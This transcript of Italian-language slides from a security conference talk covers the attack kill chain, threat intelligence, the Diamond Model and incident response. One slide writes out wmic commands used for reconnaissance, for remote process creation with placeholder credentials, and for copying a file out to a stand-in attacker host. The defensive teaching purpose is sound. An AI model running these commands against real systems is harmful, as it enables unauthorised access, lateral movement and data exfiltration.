The more you know the better you do
Transcript
The more you know the better you do
The more you know the better you do @RSAEMEA #RSAEMEASummit Demetrio Milea, Advanced Cyber Defence Consultant EMEA Locard’s Exchange Principle ”Wherever he steps, whatever he touches, whatever he leaves, even unconsciously, will serve as a silent witness against him. Not only his fingerprints or his footprints, but his hair, the fibers from his clothes, the glass he breaks, the tool mark he leaves, the paint he scratches, the blood he deposits.„ Edmond Locard (20° century) - Criminologo It is impossible for a criminal to act, especially considering the intensity of a crime, without leaving traces of this presence. © Copyright 2015 EMC Corporation. All rights reserved. 2 Ciclo di vita di un attacco (aka Kill Chain) 1. Intelligence Gathering 6. 2. Data Exfiltration Initial Exploitation 5. Lateral Movement 3. Privilege Escalation 4. Rootkit & CnC © Copyright 2015 EMC Corporation. All rights reserved. 3 Le tracce dell’attaccante EndPoint Applicativo Network https://blogs.rsa.com/eliminated-impossible/ © Copyright 2015 EMC Corporation. All rights reserved. 4 Il gap da colmare La sicurezza aziendale di tipo legacy VS L’innovazione esponenziale della sicurezza offensiva © Copyright 2015 EMC Corporation. All rights reserved. 5 Gli strumenti di sicurezza legacy Anti Virus SIEM IDS IPS Fire wall © Copyright 2015 EMC Corporation. All rights reserved. 6 Le aziende ancora oggi ... • Vulnerabilità a livello applicativo (RCE, XSS, SQLi) • Scarsa formazione dei dipendenti sulla sicurezza • Autenticazione ad un solo fattore • Policy e procedure datate • Controlli applicativi deboli • Applicazioni e sistemi operativi non aggiornati • Fornitori e terze parti non controllati © Copyright 2015 EMC Corporation. All rights reserved. 7 ... gli attaccanti invece • Windows Management Instrumentation: tecnologia integrata nei S.O. Microsoft (>= Windows 2000), che può essere utilizzata dall'amministratore di sistema per la gestione di workstation/server locali o remoti. • WQL è un subset semplificato del linguaggio SQL (Structured Query Language), con alcune estensioni specifiche di WMI • É possibile eseguire comandi WMI in: – VBScript – JavaScript – PowerShell • wmic.exe tramite linea di comando ci permette di accedere a WMI MALICIOUS USE CASE! © Copyright 2015 EMC Corporation. All rights reserved. 8 (Ab)Using WMI • Information Gathering – Elenco delle patch installate, dei processi in esecuzione (locali e remoti), account utenti, risorse condivise in rete. Es. • wmic path win32_process get Caption,Processid,Commandline • wmic qfe get • wmic nicconfig where IPEnabled=’true’ • wmic process where (Name=’svchost.exe’) get name,processid • wmic /node:remote /user:user /password:pass service get Name,Caption,State,ServiceType,pathname • Lateral Movement – Esecuzione di comandi da remoto: Esempo: wmic /node:hostname /user:username / password:pass PROCESS CALL CREATE cmd.exe • Data Exifiltration – Esempio: wmic /NODE:hostname /user:username /password:pass process call create xcopy d:\\calc.rar \\ninjahost\\c$\\a.dat © Copyright 2015 EMC Corporation. All rights reserved. 9 Power[Shell|Sploit] • Versione 2.0 in Windows 7.0, V.3 in Win7 SP1, Win2008 R2 SP1 etc • Basato su programmazione ad oggetti e Framework .NET • Simile al C# PowerSploit • Collezione di script (organizzati per categorie) in PowerShell che possono essere utilizzati in tutte le fasi di un attacco. – – – – – Antivirus Bypass - Find bytes of a file which has a matching signature in antivirus. Code Execution - Used to execute code on victim machine. Exfiltration - Manipulate and collect information & data from victim machine(s). Persistence - Maintain control to machine by adding persistence to scripts. Recon - Perform reconnaissance tasks using victim machine. © Copyright 2015 EMC Corporation. All rights reserved. 10 Realtà o percezione? Comunicazione Formazione Visibilità Non è possibile controllare ciò che non si vede! © Copyright 2015 EMC Corporation. All rights reserved. 11 Gli attacchi sono inevitabili ”I am convinced that there are only two types of companies: those that have been hacked and those that will be. And even they are converging into one category: companies that have been hacked and will be hacked again.„ - Robert Mueller (RSAC 2012), 6th Director of the FBI Cyber Threat Intel, Incident Detection and Response © Copyright 2015 EMC Corporation. All rights reserved. 12 Cybercrime Response Strategy Analizzare e documentare il modus operandi degli attaccanti Rilevare gli attacchi dalle loro tracce Mitigare l’attacco. Profilare i pattern dell’attacco subito Cyber Threat Intel Threat Indicators & Incident Detection Incident Response Strategy © Copyright 2015 EMC Corporation. All rights reserved. 13 Cyber Threat Intelligence cycle Network Analysis Commercial Collection Dark Web Content Management Payload Analysis Technical Analysis Report (Tactical Reporting) Attribution Analysis IDS/IPS Strategic/Operational Reporting Firewall SIEM Monitor & Collect Automated Processing IOCs Identify & Analyze Communicate Disseminate https://blogs.rsa.com/intelligence-needs-operationalized/ © Copyright 2015 EMC Corporation. All rights reserved. 14 Profilare l’attacco e l’attaccante The Diamond Model Modello analitico sia per modellare sia per rendere operative le informazioni di intelligence. Adversary Utilizzato da: • Incident Responder • Threat Intel Analyst • Risk Analyst Axiom 1: For every intrusion event there exists an adversary taking a step towards an intended goal by using a capability over infrastructure against a victim to produce a result. Infrastructure Mail Sender IP Domains, Ips Destination IP Capability Email Headers Attachment Encryption Victim http://www.dtic.mil/dtic/tr/fulltext/u2/a586960.pdf © Copyright 2015 EMC Corporation. All rights reserved. 15 Profilare l’attacco e l’attaccante The Diamond Model – Un caso di phishing segnalato dalla vittima Adversary Adversary Infrastruct ure Capability Infrastructure • click.me • 192.158.x.x Capability • X-Mailer: Outlook Express • update.pdf.exe • POST /callhome.php Victim Victim http://www.dtic.mil/dtic/tr/fulltext/u2/a586960.pdf © Copyright 2015 EMC Corporation. All rights reserved. 16 Prepararsi a rispondere un incidente Gestire meglio incidenti futuri applicando le conoscenze acquisite da incidenti passati. What Automatizzare e misurare When Educare e praticare attività di IR Where Formare un gruppo di IR How Classificare assets, dati e utenti Valutare le competenze (P.P.T.) esistenti Identificare gli obiettivi da raggiungere Who Why https://blogs.rsa.com/human-process-elements-incident-response-plan/ © Copyright 2015 EMC Corporation. All rights reserved. 17 Metodo OODA per una risposta efficace • Observe and Orient e continua comprensione: – Business – Superficie di attacco – Dei dati, della rete dei flussi di applicativi • Decide & Act: – Dati raccolti nelle fase precedenti – Avendo analizzato tutte le possibili opzioni e conseguenze – C-Level – Seguendo le policy e le procedure © Copyright 2015 EMC Corporation. All rights reserved. John Boyd (1927 – 1997, Military Strategist) The OODA loop 18 Conclusioni • Content Analytics – Contesto di business e profilo di rischio per asset aziendale • Persone, Processi, Tecnologia – Tecnologia per promuovere la visibilità, le persone e i processi per identificare e risolvere gli incidenti. • Threat Intelligence – Prioritizzare e rendere operative le informazioni di intelligence (interna, esterna, pubblica e privata). © Copyright 2015 EMC Corporation. All rights reserved. 19 EMC, RSA, the EMC logo and the RSA logo are trademarks of EMC Corporation in the U.S. and other countries.